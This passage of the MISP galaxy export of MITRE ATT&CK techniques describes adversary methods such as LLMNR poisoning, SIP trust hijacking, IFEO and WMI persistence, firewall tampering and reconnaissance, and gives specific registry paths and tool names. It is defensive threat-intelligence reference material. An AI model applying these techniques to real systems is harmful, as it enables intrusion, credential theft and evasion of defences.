https://www.welivesecurity.com/2018/12/11/android-trojan-steals-money-paypal-accounts-2fa/

Upload, install, and configure software/tools - T1362

An adversary may stage software and tools for use during later stages of an attack. The software and tools may be placed on systems legitimately in use by the adversary or may be placed on previously compromised infrastructure. (Citation: APT1) (Citation: RedOctober)

The tag is: misp-galaxy:mitre-attack-pattern="Upload, install, and configure software/tools - T1362"

Table 3131. Table References
Links
https://attack.mitre.org/techniques/T1362

Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol - T1048.003

Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.

Adversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). This may include custom or publicly available encoding/compression algorithms (such as base64) as well as embedding data within protocol headers and fields.

The tag is: misp-galaxy:mitre-attack-pattern="Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol - T1048.003"

Table 3132. Table References
Links
https://attack.mitre.org/techniques/T1048/003
https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

LLMNR/NBT-NS Poisoning and SMB Relay - T1557.001

By responding to LLMNR/NBT-NS network traffic, adversaries may spoof an authoritative source for name resolution to force communication with an adversary controlled system. This activity may be used to collect or relay authentication materials.

Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification. LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same local link to perform name resolution for other hosts. NBT-NS identifies systems on a local network by their NetBIOS name. (Citation: Wikipedia LLMNR) (Citation: TechNet NetBIOS)

Adversaries can spoof an authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137) traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the adversary controlled system. If the requested host belongs to a resource that requires identification/authentication, the username and NTLMv2 hash will then be sent to the adversary controlled system. The adversary can then collect the hash information sent over the wire through tools that monitor the ports for traffic or through [Network Sniffing](https://attack.mitre.org/techniques/T1040) and crack the hashes offline through [Brute Force](https://attack.mitre.org/techniques/T1110) to obtain the plaintext passwords. In some cases where an adversary has access to a system that is in the authentication path between systems or when automated scans that use credentials attempt to authenticate to an adversary controlled system, the NTLMv2 hashes can be intercepted and relayed to access and execute code against a target system. The relay step can happen in conjunction with poisoning but may also be independent of it. (Citation: byt3bl33d3r NTLM Relaying)(Citation: Secure Ideas SMB Relay)

Several tools exist that can be used to poison name services within local networks such as NBNSpoof, Metasploit, and [Responder](https://attack.mitre.org/software/S0174). (Citation: GitHub NBNSpoof) (Citation: Rapid7 LLMNR Spoofer) (Citation: GitHub Responder)

The tag is: misp-galaxy:mitre-attack-pattern="LLMNR/NBT-NS Poisoning and SMB Relay - T1557.001"

Table 3133. Table References
Links
https://attack.mitre.org/techniques/T1557/001
https://en.wikipedia.org/wiki/Link-Local_Multicast_Name_Resolution
https://technet.microsoft.com/library/cc958811.aspx
https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html
https://blog.secureideas.com/2018/04/ever-run-a-relay-why-smb-relays-should-be-on-your-mind.html
https://github.com/nomex/nbnspoof
https://www.rapid7.com/db/modules/auxiliary/spoof/llmnr/llmnr_response
https://github.com/SpiderLabs/Responder
https://www.sternsecurity.com/blog/local-network-attacks-llmnr-and-nbt-ns-poisoning
https://github.com/Kevin-Robertson/Conveigh

Match Legitimate Name or Location - T1036.005

Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.

Adversaries may also use the same icon of the file they are trying to mimic.

The tag is: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005"

Table 3134. Table References
Links
https://attack.mitre.org/techniques/T1036/005
https://capec.mitre.org/data/definitions/177.html
http://pages.endgame.com/rs/627-YBU-612/images/EndgameJournal_The%20Masquerade%20Ball_Pages_R2.pdf
https://twitter.com/ItsReallyNick/status/1055321652777619457
https://docs.docker.com/engine/reference/commandline/images/

Disable or Modify System Firewall - T1562.004

Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel.

Modifying or disabling a system firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed.

The tag is: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004"

Table 3135. Table References
Links
https://attack.mitre.org/techniques/T1562/004

Disable or Modify Cloud Firewall - T1562.007

Adversaries may disable or modify a firewall within a cloud environment to bypass controls that limit access to cloud resources. Cloud firewalls are separate from system firewalls that are described in [Disable or Modify System Firewall](https://attack.mitre.org/techniques/T1562/004).

Cloud environments typically utilize restrictive security groups and firewall rules that only allow network activity from trusted IP addresses via expected ports and protocols. An adversary may introduce new firewall rules or policies to allow access into a victim cloud environment. For example, an adversary may use a script or utility that creates new ingress rules in existing security groups to allow any TCP/IP connectivity.(Citation: Expel IO Evil in AWS)

Modifying or disabling a cloud firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed.

The tag is: misp-galaxy:mitre-attack-pattern="Disable or Modify Cloud Firewall - T1562.007"

Table 3136. Table References
Links
https://attack.mitre.org/techniques/T1562/007
https://expel.io/blog/finding-evil-in-aws/

SIP and Trust Provider Hijacking - T1553.003

Adversaries may tamper with SIP and trust provider components to mislead the operating system and application control tools when conducting signature validation checks. In user mode, Windows Authenticode (Citation: Microsoft Authenticode) digital signatures are used to verify a file’s origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function, (Citation: Microsoft WinVerifyTrust) which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature. (Citation: SpectorOps Subverting Trust Sept 2017)

Because of the varying executable file types and corresponding signature formats, Microsoft created software components called Subject Interface Packages (SIPs) (Citation: EduardosBlog SIPs July 2008) to provide a layer of abstraction between API functions and files. SIPs are responsible for enabling API functions to create, retrieve, calculate, and verify signatures. Unique SIPs exist for most file formats (Executable, PowerShell, Installer, etc., with catalog signing providing a catch-all (Citation: Microsoft Catalog Files and Signatures April 2017)) and are identified by globally unique identifiers (GUIDs). (Citation: SpectorOps Subverting Trust Sept 2017)

Similar to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and application control tools to classify malicious (or any) code as signed by: (Citation: SpectorOps Subverting Trust Sept 2017)

Modifying the <code>Dll</code> and <code>FuncName</code> Registry values in <code>HKLM\SOFTWARE[\WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg{SIP_GUID}</code> that point to the dynamic link library (DLL) providing a SIP’s CryptSIPDllGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed file. By pointing to a maliciously-crafted DLL with an exported function that always returns a known good signature value (ex: a Microsoft signature for Portable Executables) rather than the file’s real signature, an adversary can apply an acceptable signature value to all files using that SIP (Citation: GitHub SIP POC Sept 2017) (although a hash mismatch will likely occur, invalidating the signature, since the hash returned by the function will not match the value computed from the file).
Modifying the <code>Dll</code> and <code>FuncName</code> Registry values in <code>HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData{SIP_GUID}</code> that point to the DLL providing a SIP’s CryptSIPDllVerifyIndirectData function, which validates a file’s computed hash against the signed hash value. By pointing to a maliciously-crafted DLL with an exported function that always returns TRUE (indicating that the validation was successful), an adversary can successfully validate any file (with a legitimate signature) using that SIP (Citation: GitHub SIP POC Sept 2017) (with or without hijacking the previously mentioned CryptSIPDllGetSignedDataMsg function). This Registry value could also be redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop and execute a new file on disk.
Modifying the <code>DLL</code> and <code>Function</code> Registry values in <code>HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\Providers\Trust\FinalPolicy\{trust provider GUID}</code> that point to the DLL providing a trust provider’s FinalPolicy function, which is where the decoded and parsed signature is checked and the majority of trust decisions are made. Similar to hijacking SIP’s CryptSIPDllVerifyIndirectData function, this value can be redirected to a suitable exported function from an already present DLL or a maliciously-crafted DLL (though the implementation of a trust provider is complex).
Note: The above hijacks are also possible without modifying the Registry via [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).

Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)

The tag is: misp-galaxy:mitre-attack-pattern="SIP and Trust Provider Hijacking - T1553.003"

Table 3137. Table References
Links
https://attack.mitre.org/techniques/T1553/003
https://msdn.microsoft.com/library/ms537359.aspx
https://msdn.microsoft.com/library/windows/desktop/aa388208.aspx
https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf
https://blogs.technet.microsoft.com/eduardonavarro/2008/07/11/sips-subject-interface-package-and-authenticode/
https://docs.microsoft.com/windows-hardware/drivers/install/catalog-files
https://github.com/mattifestation/PoCSubjectInterfacePackage
http://www.entrust.net/knowledge-base/technote.cfm?tn=8165
https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn311461(v=ws.11)
https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/dd941614(v=ws.10)

Windows Management Instrumentation Event Subscription - T1546.003

Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Examples of events that may be subscribed to are the wall clock time, user loging, or the computer’s uptime. (Citation: Mandiant M-Trends 2015)

Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015) Adversaries may also compile WMI scripts into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription. (Citation: Dell WMI Persistence) (Citation: Microsoft MOF May 2018)

WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges.

The tag is: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation Event Subscription - T1546.003"

Table 3138. Table References
Links
https://attack.mitre.org/techniques/T1546/003
https://www2.fireeye.com/rs/fireye/images/rpt-m-trends-2015.pdf
https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/sans-dfir-2015.pdf
https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf
https://www.secureworks.com/blog/wmi-persistence
https://docs.microsoft.com/en-us/windows/win32/wmisdk/managed-object-format—mof-
https://technet.microsoft.com/en-us/sysinternals/bb963902
https://medium.com/threatpunter/detecting-removing-wmi-persistence-60ccbb7dff96
https://www.elastic.co/blog/hunting-for-persistence-using-elastic-security-part-1
https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/register-wmievent?view=powershell-5.1

Executable Installer File Permissions Weakness - T1574.005

Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.

Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002). Several examples of this weakness in existing common installers have been reported to software vendors.(Citation: mozilla_sec_adv_2012) (Citation: Executable Installers are Vulnerable) If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.

The tag is: misp-galaxy:mitre-attack-pattern="Executable Installer File Permissions Weakness - T1574.005"

Table 3139. Table References
Links
https://attack.mitre.org/techniques/T1574/005
https://www.mozilla.org/en-US/security/advisories/mfsa2012-98/
https://seclists.org/fulldisclosure/2015/Dec/34

Path Interception by Unquoted Path - T1574.009

Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary’s executable to launch.

Service paths (Citation: Microsoft CurrentControlSet Services) and shortcut paths may also be vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., <code>C:\unsafe path with space\program.exe</code> vs. <code>"C:\safe path with space\program.exe"</code>). (Citation: Help eliminate unquoted path) (stored in Windows Registry keys) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is <code>C:\program files\myapp.exe</code>, an adversary may create a program at <code>C:\program.exe</code> that will be run instead of the intended program. (Citation: Windows Unquoted Services) (Citation: Windows Privilege Escalation Guide)

This technique can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process.

The tag is: misp-galaxy:mitre-attack-pattern="Path Interception by Unquoted Path - T1574.009"

Table 3140. Table References
Links
https://attack.mitre.org/techniques/T1574/009
https://capec.mitre.org/data/definitions/38.html
https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
https://isc.sans.edu/diary/Help+eliminate+unquoted+path+vulnerabilities/14464
https://securityboulevard.com/2018/04/windows-privilege-escalation-unquoted-services/
https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/

Image File Execution Options Injection - T1546.012

Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., <code>C:\dbg\ntsd.exe -g notepad.exe</code>). (Citation: Microsoft Dev Blog IFEO Mar 2010)

IFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. (Citation: Microsoft GFlags Mar 2017) IFEOs are represented as <code>Debugger</code> values in the Registry under <code>HKLM\SOFTWARE{\Wow6432Node}\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\<executable></code> where <code><executable></code> is the binary on which the debugger is attached. (Citation: Microsoft Dev Blog IFEO Mar 2010)

IFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IFEO and silent process exit Registry values in <code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\</code>. (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018)

Similar to [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), on Windows Vista and later as well as Windows Server 2008 and later, a Registry key may be modified that configures "cmd.exe," or another program that provides backdoor access, as a "debugger" for an accessibility program (ex: utilman.exe). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the "debugger" program to be executed with SYSTEM privileges. (Citation: Tilbury 2014)

Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values may also be abused to obtain privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. (Citation: Elastic Process Injection July 2017) Installing IFEO mechanisms may also provide Persistence via continuous triggered invocation.

Malware may also use IFEO to [Impair Defenses](https://attack.mitre.org/techniques/T1562) by registering invalid debuggers that redirect and effectively disable various system and security applications. (Citation: FSecure Hupigon) (Citation: Symantec Ushedix June 2008)

The tag is: misp-galaxy:mitre-attack-pattern="Image File Execution Options Injection - T1546.012"

Table 3141. Table References
Links
https://attack.mitre.org/techniques/T1546/012
https://blogs.msdn.microsoft.com/mithuns/2010/03/24/image-file-execution-options-ifeo/
https://docs.microsoft.com/windows-hardware/drivers/debugger/gflags-overview
https://docs.microsoft.com/windows-hardware/drivers/debugger/registry-entries-for-silent-process-exit
https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/
http://blog.crowdstrike.com/registry-analysis-with-crowdresponse/
https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
https://www.f-secure.com/v-descs/backdoor_w32_hupigon_emv.shtml
https://www.symantec.com/security_response/writeup.jsp?docid=2008-062807-2501-99&tabid=2

Friend/Follow/Connect to targets of interest - T1344

Once a persona has been developed an adversary will use it to create connections to targets of interest. These connections may be direct or may include trying to connect through others. (Citation: NEWSCASTER2014) (Citation: BlackHatRobinSage)

The tag is: misp-galaxy:mitre-attack-pattern="Friend/Follow/Connect to targets of interest - T1344"

View relationships graph

Friend/Follow/Connect to targets of interest - T1344 has relationships with:

related-to: misp-galaxy:mitre-attack-pattern="Friend/Follow/Connect to targets of interest - T1364" with estimative-language:likelihood-probability="almost-certain"

Table 3142. Table References
Links
https://attack.mitre.org/techniques/T1344
https://www.securityweek.com/iranian-hackers-targeted-us-officials-elaborate-social-media-attack-operation
http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf

Friend/Follow/Connect to targets of interest - T1364

A form of social engineering designed build trust and to lay the foundation for future interactions or attacks. (Citation: BlackHatRobinSage)

The tag is: misp-galaxy:mitre-attack-pattern="Friend/Follow/Connect to targets of interest - T1364"

View relationships graph

Friend/Follow/Connect to targets of interest - T1364 has relationships with:

related-to: misp-galaxy:mitre-attack-pattern="Friend/Follow/Connect to targets of interest - T1344" with estimative-language:likelihood-probability="almost-certain"

Table 3143. Table References
Links
https://attack.mitre.org/techniques/T1364
http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf

Identify personnel with an authority/privilege - T1271

Personnel internally to a company may have non-electronic specialized access, authorities, or privilege that make them an attractive target for an adversary. One example of this is an individual with financial authority to authorize large transactions. An adversary who compromises this individual might be able to subvert large dollar transfers. (Citation: RSA-APTRecon)

The tag is: misp-galaxy:mitre-attack-pattern="Identify personnel with an authority/privilege - T1271"

Table 3144. Table References
Links
https://attack.mitre.org/techniques/T1271

Receive KITs/KIQs and determine requirements - T1239

Applicable agencies and/or personnel receive intelligence requirements and evaluate them to determine sub-requirements related to topics, questions, or requirements. For example, an adversary’s nuclear energy requirements may be further divided into nuclear facilities versus nuclear warhead capabilities. (Citation: AnalystsAndPolicymaking)

The tag is: misp-galaxy:mitre-attack-pattern="Receive KITs/KIQs and determine requirements - T1239"

Table 3145. Table References
Links
https://attack.mitre.org/techniques/T1239

Identify job postings and needs/gaps - T1248

Job postings, on either company sites, or in other forums, provide information on organizational structure and often provide contact information for someone within the organization. This may give an adversary information on technologies within the organization which could be valuable in attack or provide insight in to possible security weaknesses or limitations in detection or protection mechanisms. (Citation: JobPostingThreat)

The tag is: misp-galaxy:mitre-attack-pattern="Identify job postings and needs/gaps - T1248"

View relationships graph

Identify job postings and needs/gaps - T1248 has relationships with:

related-to: misp-galaxy:mitre-attack-pattern="Identify job postings and needs/gaps - T1267" with estimative-language:likelihood-probability="almost-certain"
related-to: misp-galaxy:mitre-attack-pattern="Identify job postings and needs/gaps - T1278" with estimative-language:likelihood-probability="almost-certain"

Table 3146. Table References
Links
https://attack.mitre.org/techniques/T1248

Analyze hardware/software security defensive capabilities - T1294

An adversary can probe a victim’s network to determine configurations. The configurations may provide opportunities to route traffic through the network in an undetected or less detectable way. (Citation: OSFingerprinting2014)

The tag is: misp-galaxy:mitre-attack-pattern="Analyze hardware/software security defensive capabilities - T1294"

Table 3147. Table References
Links
https://attack.mitre.org/techniques/T1294

Discover target logon/email address format - T1255

Email addresses, logon credentials, and other forms of online identification typically share a common format. This makes guessing other credentials within the same domain easier. For example if a known email address is first.last@company.com it is likely that others in the company will have an email in the same format. (Citation: RSA-APTRecon)

The tag is: misp-galaxy:mitre-attack-pattern="Discover target logon/email address format - T1255"

Table 3148. Table References
Links
https://attack.mitre.org/techniques/T1255

Identify job postings and needs/gaps - T1267

Job postings, on either company sites, or in other forums, provide information on organizational structure and often provide contact information for someone within the organization. This may give an adversary information on people within the organization which could be valuable in social engineering attempts. (Citation: JobPostingThreat)

The tag is: misp-galaxy:mitre-attack-pattern="Identify job postings and needs/gaps - T1267"

View relationships graph

Identify job postings and needs/gaps - T1267 has relationships with:

related-to: misp-galaxy:mitre-attack-pattern="Identify job postings and needs/gaps - T1248" with estimative-language:likelihood-probability="almost-certain"
related-to: misp-galaxy:mitre-attack-pattern="Identify job postings and needs/gaps - T1278" with estimative-language:likelihood-probability="almost-certain"

Table 3149. Table References
Links
https://attack.mitre.org/techniques/T1267

Identify job postings and needs/gaps - T1278

Job postings, on either company sites, or in other forums, provide information on organizational structure, needs, and gaps in an organization. This may give an adversary an indication of weakness in an organization (such as under-resourced IT shop). Job postings can also provide information on an organizations structure which could be valuable in social engineering attempts. (Citation: JobPostingThreat) (Citation: RSA-APTRecon)

The tag is: misp-galaxy:mitre-attack-pattern="Identify job postings and needs/gaps - T1278"

View relationships graph

Identify job postings and needs/gaps - T1278 has relationships with:

related-to: misp-galaxy:mitre-attack-pattern="Identify job postings and needs/gaps - T1267" with estimative-language:likelihood-probability="almost-certain"
related-to: misp-galaxy:mitre-attack-pattern="Identify job postings and needs/gaps - T1248" with estimative-language:likelihood-probability="almost-certain"

Table 3150. Table References
Links
https://attack.mitre.org/techniques/T1278

Analyze organizational skillsets and deficiencies - T1300

Analyze strengths and weaknesses of the target for potential areas of where to focus compromise efforts. (Citation: FakeLinkedIn)

The tag is: misp-galaxy:mitre-attack-pattern="Analyze organizational skillsets and deficiencies - T1300"

View relationships graph

Analyze organizational skillsets and deficiencies - T1300 has relationships with:

related-to: misp-galaxy:mitre-attack-pattern="Analyze organizational skillsets and deficiencies - T1297" with estimative-language:likelihood-probability="almost-certain"
related-to: misp-galaxy:mitre-attack-pattern="Analyze organizational skillsets and deficiencies - T1289" with estimative-language:likelihood-probability="almost-certain"

Table 3151. Table References
Links
https://attack.mitre.org/techniques/T1300

Exfiltration Over Other Network Medium - T1011

Adversaries may attempt to exfiltrate data over a different network medium than the command and control channel. If the command and control network is a wired Internet connection, the exfiltration may occur, for example, over a WiFi connection, modem, cellular data connection, Bluetooth, or another radio frequency (RF) channel.

Adversaries may choose to do this if they have sufficient access or proximity, and the connection might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network

The tag is: misp-galaxy:mitre-attack-pattern="Exfiltration Over Other Network Medium - T1011"

Table 3152. Table References
Links
https://attack.mitre.org/techniques/T1011

Network Traffic Capture or Redirection - T1410

An adversary may capture network traffic to and from the device to obtain credentials or other sensitive data, or redirect network traffic to flow through an adversary-controlled gateway to do the same.

A malicious app could register itself as a VPN client on Android or iOS to gain access to network packets. However, on both platforms, the user must grant consent to the app to act as a VPN client, and on iOS the app requires a special entitlement that must be granted by Apple.

Alternatively, if a malicious app is able to escalate operating system privileges, it may be able to use those privileges to gain access to network traffic.

An adversary could redirect network traffic to an adversary-controlled gateway by establishing a VPN connection or by manipulating the device’s proxy settings. For example, Skycure (Citation: Skycure-Profiles) describes the ability to redirect network traffic by installing a malicious iOS Configuration Profile.

If applications encrypt their network traffic, sensitive data may not be accessible to an adversary, depending on the point of capture.

The tag is: misp-galaxy:mitre-attack-pattern="Network Traffic Capture or Redirection - T1410"

Table 3153. Table References
Links
https://attack.mitre.org/techniques/T1410
https://www.skycure.com/blog/malicious-profiles-the-sleeping-giant-of-ios-security/

Determine 3rd party infrastructure services - T1260

Infrastructure services includes the hardware, software, and network resources required to operate a communications environment. This infrastructure can be managed by a 3rd party rather than being managed by the owning organization. (Citation: FFIECAwareness) (Citation: Zetter2015Threats)

The tag is: misp-galaxy:mitre-attack-pattern="Determine 3rd party infrastructure services - T1260"

View relationships graph

Determine 3rd party infrastructure services - T1260 has relationships with:

related-to: misp-galaxy:mitre-attack-pattern="Determine 3rd party infrastructure services - T1284" with estimative-language:likelihood-probability="almost-certain"

Table 3154. Table References
Links
https://attack.mitre.org/techniques/T1260

Analyze presence of outsourced capabilities - T1303

Outsourcing, the arrangement of one company providing goods or services to another company for something that could be done in-house, provides another avenue for an adversary to target. Businesses often have networks, portals, or other technical connections between themselves and their outsourced/partner organizations that could be exploited. Additionally, outsourced/partner organization information could provide opportunities for phishing. (Citation: Scasny2015) (Citation: OPM Breach)

The tag is: misp-galaxy:mitre-attack-pattern="Analyze presence of outsourced capabilities - T1303"

Table 3155. Table References
Links
https://attack.mitre.org/techniques/T1303

Data from Cloud Storage Object - T1530

Adversaries may access data objects from improperly secured cloud storage.

Many cloud service providers offer solutions for online data storage such as Amazon S3, Azure Storage, and Google Cloud Storage. These solutions differ from other storage solutions (such as SQL or Elasticsearch) in that there is no overarching application. Data from these solutions can be retrieved directly using the cloud provider’s APIs. Solution providers typically offer security guides to help end users configure systems.(Citation: Amazon S3 Security, 2019)(Citation: Microsoft Azure Storage Security, 2019)(Citation: Google Cloud Storage Best Practices, 2019)

Misconfiguration by end users is a common problem. There have been numerous incidents where cloud storage has been improperly secured (typically by unintentionally allowing public access by unauthenticated users or overly-broad access by all users), allowing open access to credit cards, personally identifiable information, medical records, and other sensitive information.(Citation: Trend Micro S3 Exposed PII, 2017)(Citation: Wired Magecart S3 Buckets, 2019)(Citation: HIPAA Journal S3 Breach, 2017) Adversaries may also obtain leaked credentials in source repositories, logs, or other means as a way to gain access to cloud storage objects that have access permission controls.

The tag is: misp-galaxy:mitre-attack-pattern="Data from Cloud Storage Object - T1530"

Table 3156. Table References
Links
https://attack.mitre.org/techniques/T1530
https://aws.amazon.com/premiumsupport/knowledge-center/secure-s3-resources/
https://docs.microsoft.com/en-us/azure/storage/common/storage-security-guide
https://cloud.google.com/storage/docs/best-practices
https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/a-misconfigured-amazon-s3-exposed-almost-50-thousand-pii-in-australia
https://www.wired.com/story/magecart-amazon-cloud-hacks/
https://www.hipaajournal.com/47gb-medical-records-unsecured-amazon-s3-bucket/

Boot or Logon Initialization Scripts - T1037

Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence. Initialization scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server. These scripts can vary based on operating system and whether applied locally or remotely.

Adversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary.

An adversary may also be able to escalate their privileges since some boot or logon initialization scripts run with higher privileges.

The tag is: misp-galaxy:mitre-attack-pattern="Boot or Logon Initialization Scripts - T1037"

Table 3157. Table References
Links
https://attack.mitre.org/techniques/T1037
https://capec.mitre.org/data/definitions/564.html

Data from Network Shared Drive - T1039

Adversaries may search network shares on computers they have compromised to find files of interest. Sensitive data can be collected from remote systems via shared network drives (host shared directory, network file server, etc.) that are accessible from the current system prior to Exfiltration. Interactive command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106) may be used to gather information.

The tag is: misp-galaxy:mitre-attack-pattern="Data from Network Shared Drive - T1039"

Table 3158. Table References
Links
https://attack.mitre.org/techniques/T1039
https://capec.mitre.org/data/definitions/639.html

Download New Code at Runtime - T1407

An app could download and execute dynamic code (not included in the original application package) after installation to evade static analysis techniques (and potentially dynamic analysis techniques) used for application vetting or application store review.(Citation: Poeplau-ExecuteThis)

On Android, dynamic code could include native code, Dalvik code, or JavaScript code that uses the Android WebView’s JavascriptInterface capability.(Citation: Bromium-AndroidRCE)

On iOS, techniques also exist for executing dynamic code downloaded after application installation.(Citation: FireEye-JSPatch)(Citation: Wang)

The tag is: misp-galaxy:mitre-attack-pattern="Download New Code at Runtime - T1407"

Table 3159. Table References
Links
https://attack.mitre.org/techniques/T1407
https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-20.html
https://www.internetsociety.org/sites/default/files/10_5_0.pdf
https://labs.bromium.com/2014/07/31/remote-code-execution-on-android-devices/
https://www.fireeye.com/blog/threat-research/2016/01/hot_or_not_the_bene.html
https://www.usenix.org/conference/usenixsecurity13/technical-sessions/presentation/wang_tielei

Windows Management Instrumentation Event Subscription - T1084

Windows Management Instrumentation (WMI) can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. Adversaries may attempt to evade detection of this technique by compiling WMI scripts into Windows Management Object (MOF) files (.mof extension). (Citation: Dell WMI Persistence) Examples of events that may be subscribed to are the wall clock time or the computer’s uptime. (Citation: Kazanciyan 2014) Several threat groups have reportedly used this technique to maintain persistence. (Citation: Mandiant M-Trends 2015)

The tag is: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation Event Subscription - T1084"

View relationships graph

Windows Management Instrumentation Event Subscription - T1084 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation Event Subscription - T1546.003" with estimative-language:likelihood-probability="almost-certain"

Table 3160. Table References
Links
https://attack.mitre.org/techniques/T1084
https://www.secureworks.com/blog/wmi-persistence
